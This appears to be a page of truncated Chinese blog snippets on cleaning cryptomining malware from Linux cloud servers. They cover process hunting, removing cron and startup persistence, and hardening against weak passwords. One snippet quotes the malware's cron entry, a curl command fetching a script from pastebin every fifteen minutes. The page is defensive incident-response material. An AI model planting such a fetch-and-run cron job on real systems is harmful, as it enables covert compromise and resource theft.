一般情况下，挖矿病毒都是自动扫描+自动挂马生成的，并不会是有专人进行攻击，所以也比较好清除，注意清除之后需要 check 有无后门。 最重要几点（也可能是被hack的原因）：禁止 ROOT 用户登陆，ROOT 不能使用弱密码，FRP 需要配置，不能使用默认选项。 挖矿进程占用的 CPU 资源 ...

处理过程： 1、查找异常进程，确定病毒进程，定位病毒脚本的执行用户 2、杀掉病毒进程，注意要检查清楚，病毒进程可能有多个，同时也要注意不要误删系统进程或者阿里云的进程 3、检查定时任务，一般都会有，以达到病毒自启的效果，通过定时任务内容定位病毒脚本的位置，然后删除病毒脚本 4、整改 ...

因为我在工作的时候被各种挖矿病毒搞过几次，所以在这里整理下我遇到的病毒以及大神们的解决方案。 服务器中挖矿病毒后，最基本的一个特征就是CPU使用率瞬间飙升，此时可以通过top命令进行查看，确认是否有异常进程，当然有一些挖矿病毒稍微高级一些，比如pamdicks，它的进程是隐藏 ...

Linux 服务器上有挖矿病毒处理 分析 今天遇到病毒挖矿，有点小兴奋。 来波分析： 看上面的症状是：攻击者通过docker入侵的【后面了解，可能是redis账号密码简单的原因被爆破的】 最奇诡的事，攻击者可能通过提权，获取到root的权限。然后一些列的挖矿病毒 大致流程图 ...

这几天阿里云云服务器cpu一直跑满，一查发现有个定时任务，在搜索一下，发现自己中毒了，原来前几天搞redis学习的时候设置了个弱密码，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...

清理bash_profile 打开终端，清理到用户下bash_profile文件，默认在/home/${name}/的隐藏文件内容中记录 删除crontab下任务 查询启动脚本的任务 删除 依次查看rc.d init.d 系统服务 删除以下文件 删除命令 ...

参考：https://blog.csdn.net/cxu123321/article/details/106915757/ 1、删除 /.Xll/xr 2、计划任务处理，/etc/crontab文 ...

记录一次解决挖矿病毒的过程（进程：susupdate，networkservice） 目录 1.找出病毒进程 2.根据进程号找到运行文件的位置 3.删除病毒进程 4.删除病毒文件 4.1 文件无法正常删除如何解决？ 5. ...